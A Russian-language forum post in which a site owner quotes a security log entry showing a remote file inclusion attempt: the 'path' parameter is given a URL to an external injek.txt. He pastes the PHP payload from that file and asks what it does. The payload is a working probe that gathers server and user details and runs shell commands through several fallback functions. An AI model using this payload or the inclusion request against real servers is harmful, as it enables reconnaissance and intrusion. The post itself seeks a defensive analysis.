Кто подскажет что пытались сделать с сайтом?, (+) Опции

[xpx]

СегоднЯ обнаружил 10 писем в почтовом Ящике с сообщением о безопасности.

Безопасность

Запрещенное действие: URL in GET - path = http://test.bigshop.cz/uploaded/injek.txt??
IP Адрес: 209.151.70.1
Пользователь: Guest
Ссылка: //?path=http://test.bigshop.cz/uploaded/injek.txt??
Браузер: libwww-perl/5.833
Дата размещения: 03.02.2010 - 08:45:5

Просмотрев что находитьсЯ по этому адресу увидел код, кто разбираетсЯ, что с помощью этого кода хотели сделать! Кстати показал другу этот адресок, когда он его открыл, у него нод32 сработал и показал  image001.png ( 7.67 Кб ) Кол-во загрузок: 35
, мой же NOD32 с сегодняшними обновлениЯми не реагирует.
Вот код длЯ разбора полётов. Отписываем что с помощью него можно и что хотели сделать?

КОД

<?php
//eten Response
$pwd1 =   @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 =   @getenv("SERVER_SOFTWARE");
$php1 =   @phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1=   @diskfreespace($pwd1);
$all1= disk_total_space($pwd1);
$used =   ConvertBytes($all1-$free1);
$free =   ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}

echo "eten".$sf."<br>";
echo "uname -a:   $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software:   $sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";

function ConvertBytes($number) {
  $len = strlen($number);
  if($len < 4) { return sprintf("%d b", $number); }
  if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
  if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
  return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

function ex($cfe) {
  $res = '';
  if (!empty($cfe)) {
    if(function_exists('exec')) {
      @exec($cfe,$res);
      $res = join("\n",$res);
    } elseif(function_exists('shell_exec')) {
      $res = @shell_exec($cfe);
    } elseif(function_exists('system')) {
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(function_exists('passthru')) {
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(@is_resource($f = @popen($cfe,"r"))) {
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    } else { $res = "NULL"; }
  }
  return $res;
}

exit;
?>